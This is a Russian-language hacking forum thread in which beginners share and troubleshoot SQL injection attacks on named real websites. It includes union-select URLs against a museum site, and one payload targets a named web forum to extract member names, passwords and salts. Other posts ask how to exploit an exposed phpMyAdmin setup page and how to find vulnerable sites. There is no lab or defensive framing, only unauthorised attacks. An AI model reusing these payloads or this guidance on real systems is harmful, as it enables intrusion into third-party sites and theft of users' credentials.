Code: http://www.pimaair.org/collection-detail.php?cid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 хз,что делать.=\ Не раскрутить. Посмотрите плз,что сделать в данной ситуации можно...
есть сайт!выдает ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near. Пробу.1+order+by+50000000000000000000/*Все что до этого числа выдается ошибкой.Unknown column '5000000000000000000' in 'order clause'Это как понять?это чё столько полей??
Просто мой первый ресурс.Хотелось бы самому! Да все уже перепробывал все что до этого числа идет ошибка!
2 Nightmarе или так Code: http://www.webdevsforum.com/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)union(select+1,2,3,4,concat_ws(0x3a,name,password,pass_salt),6,7,8,9+from+forum_members+where+id=1)+--+
что можно поиметь с этого: _http://vulns.ru/myadmin/scripts/setup.php реально ли добавить новую БД или попасть в текущую?
Не знаю) Я в этом деле пока ламер. Несколько штук обнаруживала вручную, но говорят, что со сканерами эффективнее.
Народ, прошу не пинать сильно, только сегодня начал разбираться, читаю сейчас про sql инъекции, не совсем понятно, как находить подходящие(уязвимые) сайты. Тоесть например нужно ли искать по какому-то определенному запросу в поисковике или какой-то есть софт подходящий для этого? Хотел бы попробовать поэкспериментировать, но блин не могу ничего подходящего найти.
